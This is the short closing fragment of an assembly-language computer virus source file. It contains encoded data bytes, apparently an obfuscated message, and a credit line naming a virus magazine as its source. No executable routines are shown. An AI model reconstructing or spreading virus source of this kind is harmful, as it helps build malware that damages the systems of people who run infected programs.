db 0D3h, 0D7h, 0D8h, 9Eh, 84h, 0D7h
db 0C5h, 0DDh, 84h, 0A6h, 0DDh, 0C9h
db 84h, 0D8h, 0D3h, 84h, 0DDh, 0D3h
db 0D9h, 0D6h, 84h, 0A6h, 0C5h, 0D0h
db 0D0h, 0D7h, 84h, 92h, 92h, 92h
db 6Eh, 71h, 88h, 0CDh, 20h, 0

db 'This virus was taken from the'
db 'Kollywabbles Virus Magazine'

seg_a ends

end start
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